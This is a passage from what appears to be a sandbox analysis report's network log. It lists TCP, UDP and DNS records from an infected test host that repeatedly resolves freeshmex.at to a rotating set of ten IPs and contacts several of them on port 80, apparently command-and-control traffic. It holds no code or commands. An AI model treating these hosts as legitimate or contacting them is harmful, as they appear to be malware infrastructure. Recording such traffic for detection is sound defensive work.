                    Nov 24, 2022 20:13:37.977261066 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.977284908 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:38.022789001 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.039057016 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:38.274179935 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:38.274593115 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.277184010 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.277184010 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.529455900 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.528865099 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.528929949 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.529092073 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:39.529201031 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:39.569520950 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.616786957 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.616883993 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.616995096 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.617022991 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.664114952 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.780591011 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.801582098 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.801683903 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.801749945 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.805197954 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.828906059 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:39.848649025 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.882014990 CET8049730109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:39.882183075 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:39.882327080 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:39.882327080 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:39.939654112 CET8049730109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:40.187268019 CET8049730109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:40.187439919 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:40.187788963 CET8049730109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:40.187926054 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:40.187972069 CET4973080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:40.227238894 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:40.243123055 CET8049730109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:40.417481899 CET8049731190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:40.417690992 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:40.417757988 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:40.420681953 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:40.615468979 CET8049731190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:41.290025949 CET8049731190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:41.290081024 CET8049731190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:41.290200949 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:41.295562983 CET4973180192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:41.323060036 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.379604101 CET8049732109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:41.379720926 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.379910946 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.382425070 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.437192917 CET8049732109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:41.483448029 CET8049731190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:41.676038980 CET8049732109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:41.676321983 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.702302933 CET8049732109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:41.703080893 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.703080893 CET4973280192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:41.762249947 CET8049732109.102.255.230192.168.2.4
                    Nov 24, 2022 20:14:16.762747049 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:14:16.762825966 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:14:16.762852907 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:14:17.043456078 CET8049701123.253.32.170192.168.2.4

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2022 20:12:59.935297966 CET5657253192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:00.175766945 CET53565728.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:01.266431093 CET5091153192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:01.502526999 CET53509118.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:03.722253084 CET5968353192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:04.211875916 CET53596838.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:05.434669971 CET6416753192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:05.672918081 CET53641678.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:07.250185966 CET5856553192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:07.711612940 CET53585658.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:14.580648899 CET5223953192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:14.598026037 CET53522398.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:14.810918093 CET5680753192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:14.828412056 CET53568078.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:15.572982073 CET6100753192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:15.592614889 CET53610078.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:15.929008007 CET6068653192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:16.396440029 CET53606868.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:18.701905966 CET6112453192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:18.721328974 CET53611248.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:20.234677076 CET5944453192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:20.254560947 CET53594448.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:21.596772909 CET5557053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:21.614191055 CET53555708.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:21.912702084 CET6490653192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:21.932231903 CET53649068.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:22.244184971 CET5944653192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:22.264146090 CET53594468.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:23.836488008 CET6108853192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:23.853676081 CET53610888.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:25.197235107 CET5872953192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:25.443180084 CET53587298.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:25.826148987 CET6470053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:25.852006912 CET53647008.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:26.118453026 CET5602253192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:26.163016081 CET53560228.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:27.561788082 CET6082253192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:27.585237026 CET53608228.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:27.940895081 CET4975053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:27.964770079 CET53497508.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:29.193562984 CET6055053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:29.219906092 CET53605508.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:29.630523920 CET5485153192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:29.651410103 CET53548518.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:30.759373903 CET5730053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:30.784167051 CET53573008.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:32.005364895 CET5452153192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:32.024302959 CET53545218.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:33.404093981 CET5891453192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:33.421724081 CET53589148.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:33.718513012 CET5141953192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:33.736593008 CET53514198.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:34.239005089 CET5105453192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:34.258749962 CET53510548.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:34.651309013 CET5567353192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:34.668950081 CET53556738.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:35.423708916 CET4973553192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:35.443448067 CET53497358.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:37.516464949 CET5243753192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:37.534168005 CET53524378.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:38.002130032 CET5282553192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:38.022118092 CET53528258.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:39.548868895 CET5853053192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:39.568480968 CET53585308.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:39.808876991 CET6495953192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:39.828243017 CET53649598.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:40.208877087 CET6309353192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:40.226567030 CET53630938.8.8.8192.168.2.4
                    Nov 24, 2022 20:13:41.303160906 CET5043353192.168.2.48.8.8.8
                    Nov 24, 2022 20:13:41.322443962 CET53504338.8.8.8192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Nov 24, 2022 20:12:59.935297966 CET192.168.2.48.8.8.80x5b1bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.266431093 CET192.168.2.48.8.8.80xa72eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:03.722253084 CET192.168.2.48.8.8.80x268bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.434669971 CET192.168.2.48.8.8.80xe8d2Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.250185966 CET192.168.2.48.8.8.80x2615Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.580648899 CET192.168.2.48.8.8.80x4259Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.810918093 CET192.168.2.48.8.8.80x451cStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.572982073 CET192.168.2.48.8.8.80x6a0cStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.929008007 CET192.168.2.48.8.8.80x90b5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:18.701905966 CET192.168.2.48.8.8.80x5229Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:20.234677076 CET192.168.2.48.8.8.80x534eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.596772909 CET192.168.2.48.8.8.80x9b24Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:21.912702084 CET192.168.2.48.8.8.80x1f86Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:22.244184971 CET192.168.2.48.8.8.80xb6d9Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.836488008 CET192.168.2.48.8.8.80xd330Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.197235107 CET192.168.2.48.8.8.80xd930Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.826148987 CET192.168.2.48.8.8.80x5c52Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:26.118453026 CET192.168.2.48.8.8.80x2242Standard query (0)thepokeway.nlA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.561788082 CET192.168.2.48.8.8.80x9072Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.940895081 CET192.168.2.48.8.8.80x2c30Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.193562984 CET192.168.2.48.8.8.80xf846Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.630523920 CET192.168.2.48.8.8.80x6a41Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.759373903 CET192.168.2.48.8.8.80x76faStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.005364895 CET192.168.2.48.8.8.80xfed9Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.404093981 CET192.168.2.48.8.8.80x8cadStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.718513012 CET192.168.2.48.8.8.80xddb5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.239005089 CET192.168.2.48.8.8.80xe7fcStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.651309013 CET192.168.2.48.8.8.80xc9b3Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.423708916 CET192.168.2.48.8.8.80x5996Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.516464949 CET192.168.2.48.8.8.80xd9bbStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.002130032 CET192.168.2.48.8.8.80xbba5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.548868895 CET192.168.2.48.8.8.80x99a5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.808876991 CET192.168.2.48.8.8.80xbafcStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.208877087 CET192.168.2.48.8.8.80xe142Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.303160906 CET192.168.2.48.8.8.80xf858Standard query (0)freeshmex.atA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
